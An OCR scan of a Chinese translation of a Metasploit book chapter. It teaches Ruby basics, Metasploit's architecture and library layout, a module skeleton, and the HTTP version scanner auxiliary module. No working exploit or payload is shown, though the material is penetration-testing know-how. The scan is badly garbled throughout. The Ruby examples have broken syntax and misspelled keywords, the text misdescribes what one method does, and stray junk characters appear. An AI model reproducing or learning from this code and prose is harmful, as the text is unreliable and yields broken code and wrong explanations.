函数 可 以 显示 出 范围 中 的 最 小 值 和 最 大 值 。 


4. Ruby 中 的 数组 
我 们 可 以 简单 地 将 数组 定义 为 一 系列 的 元 素 集合 。 来 看 一 个 例子 : 


irb(main):005:0» name = ["nipun","metasploit"] 
=> ["nipun", "metasploit"] 

irb(main):006:0» name[0] 

-» "nipun" 

irb(main):007:0» name[1] 

=> "metasploit" 


到 现在 为 止 ， 已 经 介绍 了 所 有 编写 Metasploit 模 块 必需 的 变量 和 数据 类 型 的 相关 知识 。 


有 关 变 量 和 数据 类 型 的 更 多 信息 ,请 访问 http:/www.tutorialspoint.com/ruby/。 


有 关 使 用 Ruby 编 程 的 速 查 表 ， 请 参考 https://github.com/savini/cheatsheets/ 
ò raw/master/ruby/RubyCheat.pdf. 


如 果 你 现在 正 从 别 的 语言 向 Ruby 语 言 过 渡 ， 这 有 一 份 推 荐 材料 : http:/ 
hyperpolyglot.org/scriptingo 
2.1.3. Ruby 中 的 方法 


方法 是 函数 的 另 一 个 说 法 。 除 了 Ruby 程 序 员 以 外 , 其 他 背景 的 程序 员 可 能 经 常 使 用 这 两 种 叫 
法 。 方 法 就 是 指 能 执行 特定 操作 的 子 程序 。 方 法 的 使 用 实现 了 代码 的 重用 ,大 大 减 短 了 程序 的 长 
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度 。 定 义 一 个 方法 很 容易 ， 在 定义 开始 的 地 方 使 用 aef 关 键 字 ， 在 结束 的 地 方 使 用 eng 关 键 字 。 
让 我 们 通过 一 个 简单 的 程序 来 了 解 它们 的 工作 方式 ， 例 如 打印 出 50 个 空格 。 

def print_data (par1) 

Square = parl*par1 

return square 

end 

answer - print data(50) 

print (answer) 


这 里 的 print_qata 方 法 接收 主 函 数 发 送 过 来 的 参数 ， 然 后 让 其 乘 以 自身 ， 再 将 结果 使 用 
return 返 回 。 这 个 程序 将 返回 的 值 放 到 了 一 个 名 为 answer 的 变量 中 ， 随 后 输出 了 这 个 值 。 我 们 
将 在 本 童 的 后 面 和 接 下 来 的 儿童 中 频繁 地 使 用 Ruby 中 的 方法 。 


2.1.4 决策 运算 符 
与 其 他 任何 编程 语言 一 样 ， 决 策 在 Ruby 中 也 是 一 个 简单 的 概念 。 看 一 个 例子 : 


irb(main):001:0» 1» 2 


=> false 

同样 ， 再 来 查看 一 个 字符 串 数 据 的 例子 : 
irb(main):005:0» "Nipun" == "nipun" 
=> false 

irb(main):006:0» "Nipun" -- "Nipun" 
=> true 


来 看 一 个 使 用 决策 运算 符 的 简单 程序 : 


def find match(a) 

if a =~ /Metasploit/ 
return true 

else 

return false 

end 

end 

doEÉGÉ4dEAGk €JpAS 

a = "1238924983Metasploitduidisdid" 
bool, b-find, match(a) 
print bool b.to s 


在 上 面 的 这 个 程序 中 ， 我 们 使 用 了 一 个 包含 有 "Metasploit" 的 字符 串 ， 这 个 字符 串 中 的 
"Metasploit" 前 后 都 添加 了 一 些 无 用 字符 。 然 后 将 这 个 字符 串 赋 值 给 变量 a。 接 下 来 ， 将 该 变 
量 传 递 给 函数 fing_match() ， 这 个 函数 的 作用 是 检查 该 变量 是 否 可 以 匹配 正则 表达 式 
/Metasploit/。 如 果 这 个 变量 中 包含 了 "Metasploit "的话 ， 函 数 的 返回 值 就 是 true， 否则 就 
会 将 false 赋 值 给 bool_b 变 量 。 


运行 上 面 这 个 方法 将 会 产生 一 个 true, 这 是 因为 按照 决策 运算 符 =~ 的 计算 , 这 两 个 值 是 匹配 的 。 
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前 面 的 程序 在 Windows 系 统 环境 中 执行 完成 后 输出 的 结果 如 下 面 的 屏幕 截图 所 示 。 


C:NRuby23-x64Nbin»ruby.exe a.rb 
true 


2.1.5 Ruby 中 的 循环 


迭代 语句 被 称 为 循环 。 正 如 任何 其 他 编程 语言 一 样 ,Ruby 编程 中 也 包含 循环 结构 。 接 下 来 让 
我 们 来 使 用 一 下 这 种 结构 ， 看 看 它 的 语法 和 其 他 编程 语言 的 不 同 之 处 : 


def forl(a) 

for i in 0..a 

print ("Number #{i}\n") 
end 

end 

forl] (10) 


上 面 的 代码 按照 定义 的 范围 从 0 遍历 到 10， 实 现 了 循环 打印 输出 当前 的 值 。 在 这 里 我 们 使 用 
# 位 } 去 打印 输出 变量 i 的 值 。 关键 字 \n 指 定 开始 新 的 一 行 。 因此， 每 一 次 打印 输出 变量 时 ， 都 会 
自动 占用 新 的 一 行 。 


迭代 循环 是 通过 each 实 现 的 。 这 是 一 种 十 分 常见 的 做 法 ， 在 Metasploit 模 块 中 被 广泛 使 用 。 
下 面 是 一 个 示例 : 


def each example (a) 
a.each do lil 

print i.to s + "Nt" 
end 

end 

# HAMA Jp 

a = Array.new(5) 
a-[10,20,30,40,50] 
each example (a) 


在 上 面 的 代码 中 , 我 们 定义 了 一 个 方法 , 这 个 方法 接收 一 个 数组 a, 然后 将 数组 a 中 的 所 有 元 
素 用 each 循 环 打 印 出 来 。 使 用 each 方 法 完成 循环 会 将 数组 a 中 的 元 素 临 时 保存 到 i 中 ,一 直到 下 
一 个 循环 时 再 重 写 这 个 变量 的 值 。 输 出 语句 中 的 \t 表 示 一 个 制 表 位 tab )。 


€» 有 关 和 人 循环 的 更 多 信息 ， 请 访问 http://www.tutorialspoint.com/Ruby/Ruby_loops.htm。 


2.1.6 ”正则 表达 式 


正则 表达 式 用 来 匹配 一 个 字符 串 或 者 获取 字符 串 在 一 组 给 定 的 字符 串 或 句子 中 出 现 的 次 数 。 
在 Metasploit 中 ， 正 则 表达 式 是 十 分 关键 的 。 在 编写 漏洞 检查 工具 和 扫描 工具 以 及 分 析 某 个 给 定 
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端口 的 响应 时 ， 总 会 需要 使 用 正则 表达 式 。 
让 我 们 看 一 个 例子 ， 这 里 的 程序 演示 了 正则 表达 式 的 使 用 。 


设想 这 样 一 个 场景 : 我 们 有 一 个 变量 na， 它 的 值 是 Hel1o world, 我 们 需要 为 它 设计 一 个 正 
则 表达 式 。 来 看 看 下 面 的 这 部 分 代码 : 


irb(main):001:0» n = "Hello world" 
=> "Hello world" 

irb(main):004:0» r - /world/ 

=> /world/ 

irb(main):005:0» r.match n 

=> #<MatchData "world"» 
irb(main):006:0» n =~ r 

=> 6 


我 们 创建 另 一 个 名 为 z* 的 变量 ， 并 把 正则 表达 式 内 容 一 一 /worl1d/ 保 存在 其 中 。 在 下 一 行 ， 
我 们 用 MatchDpata 类 的 match 对 象 将 这 个 字符 串 和 正则 表达 式 进行 匹配 ,命令 行 返 回 了 一 个 匹配 
成 功 的 信息 MatchData "world"。 接 下 来 我 们 使 用 另 一 个 运算 符 =- 来 完成 字符 串 的 匹配 操作 和 
匹配 的 具体 位 置 。 让 我 们 看 一 个 这 样 的 例子 : 


irb(main):007:0» r = /^world/ 
=> /^world/ 

irb(main):008:0» n =~ r 

-» nil 

irb(main):009:0» r - /^Hello/ 
=> /^Hello/ 

irb(main):010:0» n =~ r 

=> 0 

irb(main):014:0» r- /world$/ 
-» /world$/ 

irb(main):015:0» n=~ r 

=> 6 


分 配 一 个 新 的 值 /^wor1ld/ 给 r， 这 里 ^ 运 算 符 表示 要 匹配 字符 串 的 开始 位 置 。 我 们 得 到 了 输 
出 nil， 这 说 明 并 没有 匹配 成 功 。 我 们 重新 修改 这 个 表达 式 以 匹配 单词 Hello 开 始 的 字符 串 。 这 
一 次 ， 系 统 的 输出 为 数字 0， 这 意味 着 在 最 开始 的 位 置 匹配 成 功 。 下 一 步 ， 我 们 将 正则 表达 式 修 
改 为 /worldqs/， 这 意味 着 只 有 一 个 以 单词 worl1d 结 尾 的 字符 串 才 会 匹配 。 


有 关 Ruby 中 的 正则 表达 式 的 更 多 信息 ， 请 访问 http:/www.tutorialspoint.comy/ 
Ruby/Ruby regular expressions.htm。 

ò 下 方 的 链接 提供 了 Ruby 编 程 语言 速 查 卡 ， 可 以 让 你 的 编程 更 高 效 : https:/ 

github.com/savini/cheatsheets/raw/master/Ruby/RubyCheat.pdf, http://hyperpolyglot. 


org/scripting.; 


有 关 如 何 构建 正确 的 正则 表达 式 的 更 多 信息 ， 请 访问 http:/rubularcomy。 
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2.1.7. Ruby 基础 知识 小 结 


怎么 样 , 是 不 是 已 经 有 些 困倦 了 ? 这 节 有 些 沉闷 吧 ? 我 们 刚刚 讨论 了 Ruby 的 基本 功能 , 这 些 
功能 都 是 设计 实现 Metasploit 模 块 所 必需 的 。Ruby 语 言 涵盖 的 内 容 十 分 丰富 ， 这 里 不 可 能 把 各 个 
方面 都 介绍 到 。 但 是 ， 你 可 以 从 下 面 的 网 址 获得 极为 优秀 的 Ruby 编 程 资源 。 


xA 


口 一 个 丰富 的 Ruby 语 言 教程 资源 库 : http://tutorialspoint.com/Ruby/. 
口 可 以 帮助 你 提高 Ruby 语 言 编程 效率 的 速 查 表 的 链接 。 


m https://github.com/savini/cheatsheets/raw/master/Ruby/RubyCheat.pdf. 
m http;//hyperpolyglot.org/scripting; 


口 有 关 Ruby 的 更 多 信息 ， 请 访问 http:/en.wikibooks.org/wiki/Ruby Programming. 


2.2 开发 自 定义 模块 

让 我 们 接着 深入 地 学 习 模 块 编写 的 过 程 。Metasploit 拥 有 大 量 的 攻击 载荷 模块 、 编 码 器 模块 、 
渗透 模块 、 空 指令 模块 、 辅 助 模块 。 这 一 将 学 习 模 块 开 发 的 要 点 。 我 们 来 了 解 一 下 如 何在 实际 
中 创建 自己 的 自 定义 模块 。 
本 节 将 就 辅助 模块 和 后 渗透 模块 的 开发 展开 讨论 。 而 对 于 渗透 模块 , 我 们 将 会 在 下 一 章 中 进 
行 详细 的 讨论 。 回 到 这 一 童 中 来 ,我们 首先 来 看 看 开发 一 个 模块 的 要 领 。 


2.2.1 ”模块 编写 的 概要 


通过 这 部 分 的 学 习 ， 我 们 将 了 解 Metasploit 的 体系 框架 ， 以 及 Metasploit 所 有 组 成 部 分 和 它们 
各 自 的 功能 。 
1. Metasploit 框 架 的 体系 结构 


Metasploit 是 由 很 多 部 件 组 成 的 ， 比 如 基础 库 文 件 、 模 块 、 插 件 以 及 工具 。Metasploit 的 体系 
框架 结构 示意 图 如 下 。 
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UML 表 示 法 


渗透 模块 
m IIIS DIA. 辅助 模块 
4 
会 话 管理 编码 模块 


渗透 模块 
控 指令 模块 
(NOP) 


MSF::UI 


驱动 msfconsole nsfct webUI msfgui m 
< 控制 终端 4 | eR avem] Aage 


来 看 看 这 些 组 件 分 别 是 什么 以 及 它们 的 功能 是 什么 。 最 好 的 切 人 点 就 是 Metasploit 的 核心 部 
分 一 一 基础 库 文件 。 


可 以 通过 下 表 中 的 说 明 来 了 解 各 种 基础 库 文 件 的 用 途 。 


基础 库 文件 名 称 用 B 

Ruby 扩 展 (REX) ”处 理 几 乎 所 有 的 核心 功能 ， 如 设置 网 络 套 接 字 、 网 络 的 连接 、 格 式 化 和 所 有 其 他 基本 功能 
MSF 核心 提供 了 基本 的 API 和 框架 的 实际 核心 
MSF 基础 对 模块 提供 了 友好 的 API 


Metasploit 中 包含 多 种 不 同 的 模块 类 型 ， 它 们 各 自 有 着 不 同 的 功能 。 攻 击 载荷 模块 用 来 创 
建 一 个 本 机 与 被 渗透 的 主机 之 间 的 通道 。 辅 助 模块 用 来 实现 各 种 辅助 操作 ， 例 如 信息 采集 、 目 
标 踩 点 、 对 一 个 应 用 程序 进行 甸 zz 测 试 以 及 各 种 服务 的 登录 。 来 看 看 这 些 模 块 的 基本 功能 ， 如 
下 表 所 示 。 


模块 类 型 X 能 
攻击 载荷 模块 这 类 模块 通常 用 来 在 成 功 闯 透 目标 以 后 建立 从 本 机 发 起 到 目标 、 从 目标 发 起 到 本 机 的 连接 , 或 者 执 


行 特定 的 任务 ， 例 如 在 目标 机 上 安装 一 个 服务 ， 等 等 。 攻 击 载 茶 模 块 是 在 成 功 渗透 了 目标 计算 机 以 
后 的 下 一 个 步 又 。 前 一 章 中 广泛 使 用 的 Meterpreter 就 是 一 个 常见 的 Metasploit 改 击 载荷 模块 


辅助 模块 辅助 模块 是 一 种 用 来 执行 指定 任务 的 特殊 模块 ， 例 如 信息 收集 、 数 据 库 特 征 识别 、 目 标 网 络 扫描 以 
实现 对 服务 的 查找 和 列举 等 

编码 器 模块 这 些 模 块 用 来 对 攻击 向 量 和 攻击 载荷 进行 加 密 ， 借 此 躲避 防 病毒 软件 和 防火 墙 的 检测 

NOP 实现 指令 的 对 齐 ， 提 高 渗透 程序 的 稳定 性 


渗透 模块 触发 一 个 系统 漏洞 的 实际 代码 
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2. 了 解 文件 结构 
Metasploit 中 的 文件 结构 如 下 图 所 示 。 


app config 


Pi 
tu 
rt 
t 


db lib 


modules plugins scripts tools vendor 
an n m m m 
msfdb ruby Gemfile Gemfile.lock metasploit- 
framework.gemspec 
= | -一 | = | =] 
msfbinscan msfconsole msfd msfelfscan msfmachscan 
= =n zm" = zm" 
msfpescan msfrop msfrpc msfrpcd msfupdate 
msfvenom Rakefile 


现在 先 来 了 解 Metasploit 中 一 些 相 关 的 目录 ， 这 将 有 助 于 我 们 更 好 地 建立 Metasploit 模 块 ， 这 
些 目录 如 下 表 所 示 。 


录 用 R 

lib Metasploit 的 核心 和 灵魂 ， 包 含 了 帮助 我 们 建立 MSF 模块 的 全 部 重要 库 文件 

modules 包含 Metasploit 中 的 所 有 模块 一 一 从 扫描 模块 到 后 渗透 模块 ,每 一 个 Metasploit 中 集成 的 模 
块 都 可 以 在 这 个 目录 中 找到 

tools 包含 了 用 于 辅助 渗透 测试 的 命令 行程 序 。 从 创造 无 用 数据 到 查找 JMP ESP 地 址 的 工具 都 
可 以 在 这 里 找到 ， 所 有 有 用 的 命令 行 程序 都 包 含 于 此 

plugins 包含 了 所 有 用 于 扩展 Metasploit 功 能 的 插件 ， 例 如 OpenVAS、Nexpose、Nessus 以 及 其 他 
各 种 可 以 使 用 1oad 命 令 载 入 的 工具 

scripts 包含 了 Meterpreter 和 其 他 各 种 脚本 

3. 库 的 布局 


Metasploit 的 模块 是 由 各 种 各 样 的 函数 构成 的 。 这 些 函 数 包括 各 种 基础 库 文件 以 及 使 用 Ruby 
编写 的 通用 程序 。 在 使 用 这 些 函 数 之 前 ,首先 要 知道 这 些 函 数 是 什么 ,如何 使 用 这 些 函 数 ， 调 用 
函数 时 需要 传递 多 少 个 参数 ?更 重要 的 是 ， 这 些 函 数 的 返回 值 会 是 什么 ? 
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来 看 看 这 些 库 的 实际 位 置 ， 如 下 面 的 屏幕 截图 所 示 。 


Iroot@mm: /usr/share/metasploit-framework/lib# ls -la -X 
total 144 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 4 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 
drwxr-xr-x 


root root 4096 Mar 21 13:18 anemone 
root root 4096 Mar 21 13:18 bit-struct 
root root 4096 Mar 21 13:18 metasm 
root root 4096 Mar 21 13:18 metasploit 
root root 4096 Mar 21 13:18 msf 

root root 4096 Mar 21 13:18 nessus 
root root 4096 Mar 21 13:18 net 

root root 4096 Mar 21 13:18 openvas 
root root 4096 Mar 21 13:18 postgres 
root root 4096 Mar 21 13:18 rabal 

root root 4096 Mar 21 13:18 rapid7 
root root 4096 Mar 21 13:18 rbmysql 
root root 4096 Mar 21 13:18 rex 

root root 4096 Mar 21 13:18 snmp 

root root 4096 Mar 21 13:18 sqlmap 
root root 4096 Mar 21 13:18 sshkey 
root root 4096 Mar 21 13:18 tasks 

root root 4096 Mar 21 13:18 telephony 


|!|bÉH|BHHPBPHHBHPHHBPHLUüOCHNNLUUONKNINSONKNNPKNSQGNIN-ULUMNO 


drwxr-xr-x 20 root root 4096 Mar 21 13:18 
drwxr-xr-x 13 root root 4096 Mar 21 13:18 .. 
Lrw-r--r-- root root 143 Jan 1 16:59 anemone.rb 
rrw-r--r-- root root 367 Jan 1 16:59 bit-struct.rb 
rFrw-r--r-- root root 2217 Jan 1 16:59 enumerable.rb 
rrw-r--r-- root root 722 Jan 1 16:59 msfenv.rb 
邮 rrw-r--r-- root root 367 Jan 1 16:59 postgres msf.rb 
rFrw-r--r-- root root 23897 Jan 1 16:59 rbmysql.rb 
rrw-r--r-- root root 2982 Jan 1 16:59 rex.rb 
"m rrw-r--r-- root root 294 Jan 1 16:59 snmp.rb 
rrw-r--r-- root root 71 Jan 1 16:59 sshkey.rb 
rFrw-r--r-- root root 71 Jan 1 16:59 telephony.rb 
rFrw-r--r-- root root 1660 Jan 1 16:59 windows console color support.rb 
- 
正如 上 图 所 示 ， 对 于 我 们 很 重要 的 REX 库 文件 位 于 /lib 目 录 下 。 在 /lib 下 还 包含 了 各 种 服务 的 


重要 目录 。 
另外 两 个 重要 的 库 /base 和 /core 位 于 /msf 目 录 下 ， 如 下 图 所 示 。 


root@mm: /usr/share/metasploit-framework/lib/msf# ls -la -X 
total 88 


drwxr-xr-x 6 root root 4096 Mar 21 13:18 base 
drwxr-xr-x 16 root root 12288 Mar 21 13:18 core 
drwxr-xr-x 3 root root 4096 Mar 21 13:18 scripts 
drwxr-xr-x 4 root root 4096 Mar 21 13:18 ui 
drwxr-xr-x 2 root root 4096 Mar 21 13:18 util 
drwxr-xr-x 7 root root 4096 Mar 21 13:18 . 
drwxr-xr-x 20 root root 4096 Mar 21 13:18 .. 
-rw-r--r-- 1 root root 1012 Jan 1 16:59 base.rb 
-rw-r--r-- 1 root root 1464 Jan 1 16:59 core.rb 
-rw-r--r-- 1 root root 156 Jan 1 16:59 events.rb 
-rw-r--r-- 1 root root 3760 Jan 1 16:59 sanity.rb 
-rw-r--r-- 1 root root 169 Jan 1 16:59 ui.rb 
-rw-r--r-- 1 root root 383 Jan 1 16:59 util.rb 
-rw-r--r-- 1 root root 24603 Jan 1 


16:59 windows error.rb 
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在 /msf/core 库 文件 夹 中 ,可 以 看 到 第 1 章 涉 及 的 所 有 模块 的 库 文件 ， 如 下 面 的 


2 root@mm: /usr/share/metasploit-framework/lib/msf/core 


auxiliary 

db manager 
encoder 
encoding 

exe 

exploit 
handler 
[ncdule 

module manager 
[nodules 
payload 

[post 

rpc 

session 
author.rb 
auxiliary.rb 
lconstants.rb 
database event.rb 
data store.rb 
db export.rb 
db import error.rb 
db manager.rb 


rootümm:/usr/share/metasploit-framework/lib/msf/cored ls -X 


encoded payload.rb 
encoder.rb 

event dispatcher.rb 
exceptions.rb 
exploit driver.rb 
exploit.rb 
framework.rb 
handler.rb 

host state.rb 
module manager.rb 
module.rb 

module set.rb 
modules.rb 

nop.rb 

opt address range.rb 
opt address.rb 

opt base.rb 

opt bool.rb 

opt enum.rb 

opt int.rb 

option container.rb 
opt path.rb 


opt port.rb 

opt raw.rb 

opt.rb 

opt regexp.rb 

opt string.rb 
payload generator.rb 
payload.rb 
payload set.rb 
platform.rb 
plugin manager.rb 
plugin.rb 

post mixin.rb 
post.rb 
reference.rb 
reflective dll loader.rb 
rpc.rb 

service state.rb 
session manager.rb 
session.rb 

site reference.rb 
target.rb 

thread manager.rb 


这 些 库 文件 提供 核心 的 辅助 模块 。 然 而 对 于 不 同 的 操作 和 功能 , 可 以 使 用 任何 需要 的 库 文件 。 


一 些 Metasploit 模 块 广泛 使 用 的 库 文件 均 位 于 core/exploits/ 目 录 下 ， 如 下 面 的 屏幕 截图 所 示 。 


format 

http 

java 

kerberos 

local 

remote 

smb 

afp.rb 

android.rb 
arkeia.rb 

browser autopwn2.rb 
browser autopwn.rb 
brute.rb 
brutetargets.rb 
capture.rb 
cmdstager.rb 
db2.rb 

dcerpc epm.rb 
dcerpc lsa.rb 


rootümm:/usr/share/metasploit-framework/lib/msf/core/exploitiü ls -X 
dcerpc mgmt.rb local.rb seh.rb 
dcerpc.rb mixins.rb sip.rb 
dect coa.rb mssql commands.rb smtp deliver.rb 
dhcp.rb mssql.rb smtp.rb 
dialup.rb mssql sqli.rb snmp.rb 
egghunter.rb mysql.rb sunrpc.rb 
exe.rb ndmp.rb tcp.rb 
file dropper.rb ntlm.rb tcp server.rb 
fileformat.rb omelet.rb telnet.rb 
fmtstr.rb oracle.rb tftp.rb 
ftp.rb pdf parse.rb tincd.rb 
ftpserver.rb pdf.rb tns.rb 
gdb.rb php exe.rb udp.rb 
imap.rb pop2.rb vim soap.rb 
ip.rb postgres.rb wbemexec.rb 
ipv6.rb powershell.rb wdbrpc client.rb 
java.rb realport.rb wdbrpc.rb 
jsobfu.rb riff.rb web.rb 
kernel mode.rb ropdb.rb winrm.rb 


PEEL BTZS o 


还 可 以 在 core/ 目 录 下 找到 支持 各 种 类 型 模块 的 所 有 相关 库 文件 。 目前 , 这 里 可 以 找到 渗透 模 
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块 、 攻 击 载荷 模块 、 后 渗透 模块 、 编 码 器 模块 以 及 各 种 其 他 模块 的 core 库 。 


在 https://github.com/rapid7/Metasploit-framework 上 可 以 访问 Metasploit 的 Git 
存储 库 ， 获 得 完整 的 源 代码 。 


2.2.2 ”了解 现 有 模块 


开发 自 定义 模块 最 好 的 办 法 就 是 先 深入 理解 Metasploit 现 有 模块 的 内 部 机 制 ， 看 看 它们 是 如 
何 工 作 的 。 我 们 就 先 按 这 种 方法 查看 一 下 在 这 些 模块 运行 的 背后 都 发 生 了 什么 。 


Metasploit 模 块 的 格式 
Metasploit 模 块 的 骨骼 框架 比较 简单 ， 下 面 的 代码 就 给 出 了 一 个 通用 的 框架 头 部 : 


require 'msf/core' 


class MetasploitModule « Msf::Auxiliary 
def initialize(info - () 
super (update info(info, 
'Name' -» 'Module name', 
'Description' => %q{ 
Say something that the user might want to know. 
} 


'Author' => [ 'Name' ], 


'License' -» MSF LICENSE 
) ) 
end 
def run 
# Main function 
end 
end 


一 个 框架 一 般 都 会 从 使 用 require 关 键 字 导入 重要 的 库 文件 开始 ， 上 面 的 代码 就 导入 了 
msf/core 库 。 所 以 ， 这 个 框架 中 就 包含 了 msf 目 录 下 的 core 库 文件 。 


接 下 来 的 主要 任务 是 使 用 MetasploitModule 指 定 这 个 类 的 类 型 ,通常 是 Metasploit3 或 
者 Metasploit4， 取 决 于 你 希望 应 用 的 版 本 。 在 定义 类 型 的 那 行 中 ， 还 需要 定义 类 的 用 途 。 我 
们 在 这 个 示例 中 定义 了 类 的 用 途 为 MSF: :Auxiliarys 


initialize 方 法 是 Ruby 编 程 语言 中 的 默认 构造 方法 。 在 这 个 方法 中 ， 我 们 定义 了 名 称 
(Name )、 描 述 (Description )、 作 者 (Author )、 许 可 (Licensing ) 和 CvE 信 息 等 。 这 个 方 
法 涵盖 了 特定 模块 的 所 有 相关 信息 : 软件 的 名 称 通常 会 体现 设计 软件 的 目的 ; 描述 中 会 包含 对 漏 
洞 的 摘要 说 明 ; 作者 是 开发 这 个 模块 的 人 的 名 字 ; 许可 就 是 MSF_LICENSE， 就 像 前 面 的 示例 代 
码 一 样 。 辅 助 模块 中 的 主 函 数 是 run 方 法 。 因 此 ， 除 非 你 要 使 用 特别 多 的 方法 ， 否 则 所 有 的 操作 
都 应 该 在 这 个 函数 里 面 执行 。 但 是 程序 仍然 要 从 run 方法 开始 执行 。 
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2.2.3 ”分解 已 有 的 HTTP 服务 器 扫描 模块 


我 们 以 一 个 简单 的 HTTP 版 本 的 扫描 模块 开始 ， 看 看 它 是 如 何 工作 的 。 这 个 Metasploit 模 块 位 
于 /modules/auxiliary/scanner/http/http_version.rb。 

先 系统 地 来 看 看 这 个 模块 : 

# 这 个 文件 是 Metasploit 框 架 的 一 部 分 ， 可 能 会 受到 版 权 保 护 


# 请 访问 Metasploit 的 网 站 httb://metasploit.com/ 获 悉 关 于 许可 条 款 的 更 多 信息 
require 'rex/proto/http' 


require 'msf/core 
class Metasploit3 « 


Msf::Auxiliary 


接 下 来 讨论 一 下 这 里 的 内 容 是 如 何 安排 的 。 一 般 来 说 ， 所 有 的 Metasploit 模 块 都 以 注释 开始 ， 


而 这 些 注释 都 是 一 些 以 # 标 识 作 为 开头 的 行 。 语 句 require 'rex/proto/http' 声 明了 该 程序 
将 要 引入 这 个 REX 库 文件 目录 下 的 所 有 HTTP 协 议 方法 ,因此 ,所 有 如 下 图 所 示 的 /lib/rex/proto/http 
目录 下 的 文件 现在 都 可 以 被 该 模块 使 用 了 。 


root8mm:/usr/share/metasploit-framework/lib/rex/proto/httpi ls -X 
handler  client.rb handler.rb  request.rb server.rb 
packet client_request.rb packet.rb response. rb 


这 些 文件 包含 了 各 种 各 样 的 HTTP 方 法 ,包括 用 于 设置 连接 的 函数 ，GET 和 PosT 的 请 求 和 响 


应 处 理 等 。 


接 下 来 的 语句 require 'msf/core' 声 明 了 该 程序 将 要 引入 Metasploit 下 的 所 有 core 库 。 语 
人 名 class Metasploit3 定 义 了 这 段 代码 适用 于 Metasploit 3 及 更 高 版 本 。 另 外 , Msf::Auxiliary 
定义 了 这 段 代 码 的 类 型 是 辅助 模块 。 接 下 来 继续 查看 这 段 代 码 。 


# 首先 调用 渗透 mixins 类 


include Msf::Exploit::Remote::HttpClient 

include Msf::Auxiliary::WmapScanServer 

# 接着 是 扫描 器 模块 mixins 类 

include Msf::Auxiliary::Scanner 

上 面 的 代码 中 包含 了 所 有 必需 的 库 文件 , 在 这 些 库 文件 中 涵盖 了 我 们 编写 模块 所 需要 的 所 有 
方法 。 下 表 给 出 了 这 些 库 文件 的 详细 信息 。 


语 f] 路 径 用 途 
Msf::Exploit::Remote::HttpClient  /lib/msf/core/exploit/http/client.rb 这 个 库 文 件 提供 了 大 量 方法 ， 例 如 
连接 到 目标 计算 机 、 发 送 请 求 、 切 
断 与 客户 端的 连接 等 
Msf::Auxiliary::WmapScanServer /lib/msf/core/auxiliarywmapmodule.b 你 可 能 在 想 ， 什 么 是 WMAP? 


Msf::Auxiliary::Scanner 


WMAP 是 一 款 基 于 Metasploit 的 通用 
Web 应 用 程序 扫描 框架 , 有 助 于 完成 
Metasploit 和 的 Web 渗 透 测试 

/lib/msf/core/auxiliary/scanner.rb 这 个 文件 包含 了 基于 扫描 模块 的 所 
有 函数 ， 提 供 了 模块 运行 、 模 块 初 
始 化 、 扫 描 进 度 等 各 种 方法 
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之 所 以 在 我 们 的 框架 中 包含 了 这 些 库 文件 ， 是 因为 在 前 面 的 代码 中 使 用 了 语句 require 
'msf/core'， 这 一 点 很 重要 。 接 着 来 看 下 一 段 代码 。 


def initialize 


super( 
'Name' -» 'HTTP Version Detection', 
'Description' -» 'Display version information about each system', 
'Author' -» 'hdm', 
'License' -» MSF LICENSE 


) 


register wmap. options(t 
'OrderID' => O0, 
'Require' -» (Jj, 
} 
end 
模块 的 这 部 分 定义 了 initialize 方 法 。 这 个 方法 初始 化 了 该 Metasploit 模 块 的 基本 参数 , 例 
如 名 称 、 作 者 、 描 述 以 及 对 于 不 同 Metasploit 模 块 的 许可 和 WMAP 模 块 的 默认 参数 。 看 看 代码 的 
最 后 一 部 分 。 


def run, host(ip) 


begin 
connect 
res = send request raw(('uri' => '/', 'method' => 'GET' }) 


return if not res 
fp = http fingerprint(:response -» reg) 
print status("H4(ip):4(rport) #{fp}") if fp 


rescue ::Timeout::Error, ::Errno::EPIPE 
end 
end 

end 

前 面 的 函数 是 扫描 功能 的 具体 实现 。 

库 和 函数 


下 表 给 出 了 在 本 模块 中 所 使 用 的 重要 函数 。 


ESO E ox tt 用 R 
run, host /lib/msf/core/auxiliary/scanner.rb 对 每 台 主 机 运行 一 次 的 主要 方法 
connect /lib/msf/core/auxiliary/scanner.rb 用 来 和 目标 主机 建立 连接 
send raw request /core/exploit/http/client.rb 用 来 向 目标 发 送 原 始 的 HTTP 请 求 
request raw /rex/proto/http/client.rb send raw request ff og P; x6 28 
request raw 
http fingerprint /lib/msf/core/exploit/http/client.rb 将 HITP 响 应 解析 为 可 以 使 用 的 变量 


来 试 着 理解 模块 。 这 里 我 们 有 一 个 名 为 run_host 的 方法 ， 该 方法 使 用 IP 作 为 建立 与 所 需 主 
机 的 连接 的 参数 。 方 法 run_host 是 从 /lib/msf/core/auxiliary/scanner.rb 文 件 中 引入 的 。 这 个 方法 将 
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为 每 台 主 机 运行 一 次 ， 如 下 图 所 示 。 


if (self.respond to?('run range')) 
# No automated progress reporting or error handling for run range 
return run range (datastore['RHOSTS']) 

end 


if (self.respond to?('run host')) 


loop do 
4 Stop scanning if we hit a fatal error 
break if has fatal errors? 


# Spawn threads for each host 
while (8tl.length < threads max) 


4$ Stop scanning if we hit a fatal error 
break if has fatal errors? 


ip = ar.next ip 
E 


break if not ip 

Gtl << framework.threads.spawn("ScannerHost( )- ", false, ip.dup) do |tipl 
targ = tip 
nmod = seif.reBlicant 


nmod.datastore['RHOST'] = targ 


t 


接 下 来 ， 我 们 有 利于 5 全 于。 这 意味 着 代码 块 的 开始 。 在 接 下 来 的 语句 中 ， 可 以 看 到 
connect 方 法 ， 这 个 方法 会 与 目标 服务 器 建立 一 个 HTTP 类 型 的 连接 。 


在 接 下 来 的 语句 中 定义 了 一 个 名 为 res 的 变量 来 存储 响应 。 我 们 将 要 使 用 /core/exploit/http/ 
client. rb 文件 中 的 sengd_raw request 方 法 ， 并 将 这 文 个 方法 的 参数 URI 的 值 设置 为 /， 参数 method 
的 值 设 置 为 GET。 


# Connects to the server, creates a request, sends the request, reads the response 
# 
# Passes +opts+ through directly to Rex::Proto::Http::Client#request raw. 
+ 
def send request raw(opts-(), timeout = 20) 
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > € 
actual timeout - datastore['HttpClientTimeout'] 
else 
actual timeout =  opts[:timeout] || timeout 
end 


begin 
c = connect (opts) 
r = c.request raw(opts) 
c.send recv(r, actual timeout) 

rescue ::Errno::EPIPE, ::Timeout::Error 
nil 

end 

end 
